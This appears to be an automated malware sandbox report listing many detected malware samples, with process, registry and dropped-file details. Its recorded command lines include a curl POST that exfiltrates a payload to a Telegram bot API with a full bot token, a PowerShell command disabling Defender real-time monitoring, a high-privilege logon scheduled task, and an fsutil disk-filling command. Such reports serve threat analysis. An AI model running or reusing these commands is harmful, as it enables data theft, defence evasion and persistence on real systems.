round_setup.exe wscript.exe no specs #CRYPTOLOCKER {34184a33-0407-212e-3300-09040709e2c2}.exe conhost.exe no specs namuvpn7.exe no specs nircmd.exe no specs ww7.exe wscript.exe no specs rxd_en_1.exe {34184a33-0407-212e-3300-09040709e2c2}.exe no specs pinaview.tmp pardufrigi_installer_1.0.p1.tmp csc.exe conhost.exe no specs setup.exe rmo_se~2.exe rexcel~1.exe no specs cmd.exe no specs brbotnet.exe no specs is-be52s.tmp is-a140u.tmp pulsar-client.exe no specs hnmh.exe THREAT powershell.exe no specs conhost.exe no specs conhost.exe no specs xclient.exe conhost.exe no specs runtimebroker.exe no specs cloudy.exe konsol.exe no specs setup.exe no specs brbotnet.exe no specs cmd.exe no specs jhgkuyyg.exe conhost.exe no specs beacon.exe conhost.exe no specs bjbh.exe jlffdd.exe wscript.exe no specs msiexec.exe no specs conhost.exe no specs service.exe cvtres.exe no specs cry.exe no specs downloader.exe no specs cmd.exe no specs isass.exe windows.x64.silent.cpu.exe no specs cvf.exe no specs lol.exe vc_redist.x64.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs urgoy.exe conhost.exe no specs #CLICKFIX x64-setup.exe conhost.exe no specs emmetprod.exe #NJRAT fast%20download.exe #NJRAT fast%20download.exe no specs access.exe csc.exe conhost.exe no specs conhost.exe no specs bruterv3.1.exe no specs sunwukongs.exe cvf.exe csc.exe jqqvlru0vaih3z.exe access.exe #GENERIC assignment.exe csc.exe cmd.exe no specs 444.exe statingconnectors.exe forfiles.exe no specs conhost.exe no specs nslookup.exe findstr.exe no specs findstr.exe no specs #REMCOS fxserver.exe install.exe no specs serials_checker.exe cmd.exe no specs csc.exe mshta.exe no specs steanings.exe agent.exe wmic.exe no specs steanings.exe steamcmd.exe axam.exe powerrat.exe no specs cmd.exe no specs #REMCOS prueba.exe conhost.exe no specs msiexec.exe no specs self-injection.exe no specs cmd.exe no specs #REMCOS prueba.exe no specs conhost.exe no specs hack.exe no specs axam.exe curl.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs uac_bypass.exe no specs powershell.exe no specs dxwebsetup.exe isass.exe no specs axam.exe conhost.exe no specs gxjgd.exe no specs wmic.exe no specs alphatweaks.exe no specs payload.exe no specs cssgo.exe schtasks.exe no specs kdmapper_release.exe no specs cvtres.exe no specs conhost.exe no specs dxwsetup.exe wmic.exe no specs srtware.exe no specs powershell.exe no specs conhost.exe no specs loader.exe cvtres.exe no specs cagservice.exe no specs netsh.exe no specs lab01-02.exe no specs cvtres.exe no specs namuvpnx2.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs client-built.exe client-built.exe conhost.exe no specs mova.exe no specs powershell.exe no specs donut.exe no specs conhost.exe no specs #REMCOS prueba.exe no specs bnkrigkawd.exe no specs taskkill.exe no specs powershell.exe no specs cvtres.exe no specs cmd.exe no specs conhost.exe no specs axam.exe conhost.exe no specs THREAT putty.exe no specs mspaint.exe no specs pclient.exe no specs axam.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs openwith.exe client-built.exe cmd.exe no specs powershell.exe no specs updater.exe conhost.exe no specs axam.exe powershell.exe no specs svchost.exe no specs ipconfig.exe no specs find.exe no specs find.exe no specs find.exe no specs svchost.exe no specs conhost.exe no specs svchost.exe no specs autoit3.exe no specs justpoc.exe powershell.exe no specs ogfn%20updater.exe no specs powershell.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs cleanup_tool.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs 3e3ev3.exe timeout.exe no specs ljgksdtihd.exe keygen.exe no specs cmd.exe no specs script.exe no specs srfuhxm.exe no specs connector1.exe #NESHTA inieditor.exe svchost.exe no specs connector1.exe taskmoder.exe powershell.exe no specs hell9o.exe conhost.exe no specs schtasks.exe no specs wildfire-test-pe-file.exe no specs svchost.exe no specs cmd.exe no specs conhost.exe no specs #COINMINER file_7d9b4f2278093dda.exe forfiles.exe no specs conhost.exe no specs kg.exe no specs conhost.exe no specs axam.exe powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs axam.exe conhost.exe no specs conhost.exe no specs axam.exe conhost.exe no specs plantrojan.exe njrat.exe no specs axam.exe powershell.exe no specs requirements.exe no specs #DONUTLOADER donut.exe conhost.exe no specs #NESHTA extremeinjector.exe #NESHTA file.exe axam.exe #METERPRETER 1223.exe cmd.exe no specs cmd.exe no specs #NESHTA 1210.exe #NESHTA builder.exe #NESHTA builder.exe #NESHTA bsg.exe axam.exe conhost.exe no specs cmd.exe no specs pfntjejghjsdkr.exe #GENERIC rustmedebyg.exe werfault.exe no specs #COINMINER lol1.exe powershell.exe no specs vc_redist.x64.exe #NESHTA phantom.exe axam.exe curl.exe axam.exe cmd.exe no specs axam.exe conhost.exe no specs #NESHTA extremeinjector.exe axam.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs coronavirus.exe no specs patcher.exe no specs riende.exe no specs powershell.exe no specs voklight.exe a.exe no specs powershell.exe no specs THREAT powershell.exe no specs black.exe no specs offlinepackv4.exe no specs #SHIFU sanghyun.exe no specs services.exe no specs calendar.exe yellow%20pages%20scraper.exe no specs powershell.exe no specs memz.exe no specs conhost.exe no specs #EMOTET 640.exe no specs rdpw_installer.exe evil.exe xerox01_pdf.exe no specs doublepulsar-1.3.1.exe no specs btpc.exe no specs fo-wsftp605.exe no specs inst77player_1.0.0.1.exe no specs #NOESCAPE noescape.exe no specs haeum.exe #SHIFU sanghyun-guest.exe no specs mely.exe no specs rsh-192-168-1-89.exe snd16061.exe no specs cmd.exe no specs msiexec.exe no specs mshta.exe no specs mshta.exe no specs msiexec.exe no specs msiexec.exe no specs 12.exe no specs zke-ascv.exe no specs cmd.exe no specs #SMBSCAN meredrop.exe cmd.exe no specs cmd.exe no specs zke-nfoview.exe no specs agentnov.exe no specs msiexec.exe no specs crypted.exe no specs safman_setup.exe #VIDAR chrome_134.exe no specs #NESHTA petya.a.exe #NESHTA infinitycrypt.exe #NESHTA processhide32.exe #NESHTA sharphound.exe #NESHTA update.exe #NESHTA cryptowall.exe #NESHTA backdoor.exe #SCREENCONNECT screenconnect.clientsetup.exe #SCREENCONNECT screenconnect.clientsetup.exe #NESHTA nc64.exe #NESHTA driveapplet.exe #NESHTA destover.exe #NESHTA jigsaw.exe #NESHTA freeyoutubedownloader.exe #GENERIC namu864.exe #GENERIC classticket.exe #GENERIC file_a6357da6a05d7266.exe #COINMINER lol11.exe #NESHTA standalone_payload.exe #NESHTA bnoaprihjatuasss.exe werfault.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs namuvpn32.exe no specs namuvpn32.exe no specs #NESHTA jeditor.exe #GENERIC tinder%20bot.exe #NESHTA hack1226.exe 4j8576a0e8v3.exe no specs #NESHTA security.exe 4j8576a0e8v3.exe no specs #PUREHVNC mueiel09765.exe pcclear_eng_mini.exe no specs #GENERIC pxray_cast_sort.exe #NESHTA privacypolicy.exe loader.exe no specs conhost.exe no specs nslookup.exe conhost.exe no specs conhost.exe no specs findstr.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs findstr.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs bcdc.tmp no specs axam.exe no specs #NESHTA executavel_temporario.exe cmd.exe no specs conhost.exe no specs #NESHTA gui.exe werfault.exe no specs werfault.exe no specs #EMOTET 640.exe #NESHTA 1488.exe namuvpnxp.exe no specs voklightd.exe windowsupdate.exe no specs ui.exe nomoreransom.exe no specs #GENERIC 123123.exe cmd.exe no specs sgn.exe no specs #NESHTA 5252.exe rsh-192-168-1-89.exe cmd.exe no specs steamcmd.exe regasm.exe no specs cmd.exe no specs conhost.exe no specs axam.exe no specs axam.exe no specs axam.exe no specs axam.exe no specs conhost.exe no specs safman_setup.tmp no specs axam.exe no specs cmd.exe no specs fastpingagent.exe no specs %e5%88%92%e5%ad%a6%e5%8f%b7v2--%e6%9e%81%e9%80%9f%e7%89%88.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs curl.exe axam.exe no specs evil.exe no specs powershell.exe no specs cacls.exe no specs powershell.exe no specs conhost.exe cmd.exe no specs conhost.exe cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs rdpwinst.exe no specs curl.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs fsutil.exe no specs conhost.exe no specs axam.exe no specs axam.exe no specs werfault.exe no specs firefox.exe cmd.exe no specs werfault.exe no specs cmd.exe no specs msedge.exe no specs chrome.exe cmd.exe no specs axam.exe no specs chrome.exe firefox.exe ping.exe no specs conhost.exe no specs find.exe no specs msedge.exe no specs axam.exe no specs fsutil.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs #EMOTET paramssps.exe no specs #EMOTET paramssps.exe axam.exe no specs axam.exe no specs cmd.exe no specs curl.exe sc.exe no specs find.exe no specs ping.exe no specs conhost.exe no specs xaimnmxg.jvk.scr no specs searchapp.exe no specs searchapp.exe no specs searchapp.exe no specs cmd.exe no specs searchapp.exe no specs searchapp.exe no specs searchapp.exe no specs msiexec.exe no specs steamerrorreporter.exe cmd.exe no specs cmd.exe no specs axam.exe no specs cmd.exe no specs fsutil.exe no specs setup.exe no specs bcdedit.exe no specs axam.exe no specs chcp.com no specs cmd.exe no specs conhost.exe no specs csc.exe xcopy.exe netsh.exe no specs conhost.exe no specs explorer.exe no specs cmd.exe no specs explorer.exe no specs dw20.exe no specs findstr.exe no specs netsh.exe no specs findstr.exe no specs axam.exe no specs powershell.exe no specs fsutil.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs cvtres.exe no specs xcopy.exe powershell.exe no specs axam.exe no specs powershell.exe no specs fsutil.exe no specs conhost.exe no specs dw20.exe no specs chcp.com no specs 52.exe [upg]css.exe no specs explorer.exe no specs xcopy.exe no specs netsh.exe no specs findstr.exe no specs cmd.exe no specs cmd.exe no specs #CLICKFIX svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
672\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812schtasks /Create /TN crypto_nuke_task /TR \"C:\Users\admin\Desktop\2to1ep.exe\" /SC ONLOGON /RL HIGHEST /FC:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
1152C:\WINDOWS\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot7537474697:AAHwFMsfiTclsNjzTz2zmu3_OUp0MFYj2eY/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonC:\Windows\SysWOW64\cmd.execvf.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1500"C:\Program Files\Mozilla Firefox\firefox.exe" --headless --incognitoC:\Program Files\Mozilla Firefox\firefox.exe
conhost.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
HIGH
Description:
Firefox
Version:
136.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
1660"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealTimeMonitoring TrueC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1884find /N ":" C:\Windows\SysWOW64\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (grep) Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\find.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2156EagleWingsDNA04.exeC:\Users\admin\Desktop\a\EagleWingsDNA04.exe
2to1ep.exe
User:
admin
Integrity Level:
HIGH
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\a\eaglewingsdna04.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2700fsutil file createnew "f1fi468_17658\3 1 newt.txt" 10000000000C:\Windows\System32\fsutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
fsutil.exe
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\fsutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2760VC_redist.x64.exeC:\Users\admin\Desktop\a\VC_redist.x64.exe2to1ep.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.44.35208
Exit code:
4294967295
Version:
14.44.35208.0
Modules
Images
c:\users\admin\desktop\a\vc_redist.x64.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events
262 529
Read events
261 515
Write events
964
Delete events
50

Modification events

(PID) Process:(8664) OpenWith.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\oregres.dll,-205
Value:
Word
(PID) Process:(8664) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.api\OpenWithProgids
Operation:writeName:Acrobat.Plugin
Value:
(PID) Process:(8664) OpenWith.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@wmploc.dll,-102
Value:
Windows Media Player
(PID) Process:(4592) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:delete valueName:Preferences
Value:
(PID) Process:(4284) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(4284) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(4284) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(4284) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(9084) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
YZ5E4ZJ5V7Z439Y5493G57Y5
(PID) Process:(9084) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
YZ5E4ZJ5V7Z439Y5493G57Y5
Executable files
881
Suspicious files
130
Text files
1 994
Unknown types
4

Dropped files

PID
Process
Filename
Type
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_bz2.pydexecutable
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB
SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_asyncio.pydexecutable
MD5:56F958EEBBC62305B4BF690D61C78E28
SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_cffi_backend.cp313-win_amd64.pydexecutable
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_ctypes.pydexecutable
MD5:29873384E13B0A78EE9857604161514B
SHA256:3CC8500A958CC125809B0467930EBCCE88A09DCC0CEDD7A45FACF3E332F7DB33
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_decimal.pydexecutable
MD5:21FCB8E3D4310346A5DC1A216E7E23CA
SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_multiprocessing.pydexecutable
MD5:807DD90BE59EA971DAC06F3AAB4F2A7E
SHA256:B20DD6F5FAB31476D3D8D7F40CB5AB098117FA5612168C0FF4044945B6156D47
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\_ssl.pydexecutable
MD5:689F1ABAC772C9E4C2D3BAD3758CB398
SHA256:D3A89AA7E4A1DF1151632A8A5CAF338C4DDDB674EC093BFDBC122ADC9DB28A97
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:FC009A82F0FAB71E2C8ADF7F60F489C8
SHA256:D2ADD358A45999E95F67D923F1B4F5A27F5A1A895225121909D716EDF5AE13E7
